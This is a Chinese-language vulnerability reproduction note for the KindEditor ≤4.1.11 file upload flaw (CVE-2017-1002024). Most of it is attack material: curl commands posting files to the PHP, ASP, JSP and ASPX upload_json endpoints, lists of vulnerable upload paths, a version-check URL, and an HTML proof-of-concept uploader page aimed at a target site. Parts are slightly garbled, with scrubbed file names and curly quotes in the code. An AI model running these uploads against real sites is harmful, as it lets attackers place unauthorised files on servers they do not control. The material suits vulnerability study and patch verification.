（CVE-2017-1002024）Kindeditor \<=4.1.11 上传漏洞
=================================================

一、漏洞简介
------------

漏洞存在于kindeditor编辑器里，你能上传.txt和.html文件，支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.11编辑器中

二、漏洞影响
------------

Kindeditor \<=4.1.11

三、复现过程
------------

```
curl -F"[email protected]" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file
curl -F"[email protected]" http://127.0.0.1/kindeditor/asp/upload_json.asp?dir=file
curl -F"[email protected]" http://127.0.0.1/kindeditor/jsp/upload_json.jsp?dir=file
curl -F"[email protected]" http://127.0.0.1/kindeditor/aspx/upload_json.aspx?dir=file 
​```返回值为路径 
```



> json文件地址

    /asp/upload_json.asp
    
    /asp.net/upload_json.ashx
    
    /jsp/upload_json.jsp
    
    /php/upload_json.php

> 上传路径

    kindeditor/asp/upload_json.asp?dir=file
    
    kindeditor/asp.net/upload_json.ashx?dir=file
    
    kindeditor/jsp/upload_json.jsp?dir=file
    
    kindeditor/php/upload_json.php?dir=file

> 查看版本信息

    http://www.0-sec.org/kindeditor//kindeditor.js

![](./resource/(CVE-2017-1002024)Kindeditor<=4.1.11上传漏洞/media/rId24.jpg)

> 构造poc

    <html><head>
    <title>Uploader</title>
    <script src="http://www.0-sec.org/kindeditor//kindeditor.js"></script>
    <script>
    KindEditor.ready(function(K) {
    var uploadbutton = K.uploadbutton({
    button : K(‘#uploadButton‘)[0],
    fieldName : ‘imgFile‘,
    url : ‘http://www.0-sec.org/kindeditor/jsp/upload_json.jsp?dir=file‘,
    afterUpload : function(data) {
    if (data.error === 0) {
    var url = K.formatUrl(data.url, ‘absolute‘);
    K(‘#url‘).val(url);}
    },
    });
    uploadbutton.fileBox.change(function(e) {
    uploadbutton.submit();
    });
    });
    </script></head><body>
    <div>
    <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
    <input type="button" id="uploadButton" value="Upload" />
    </div>
    </body>
    </html>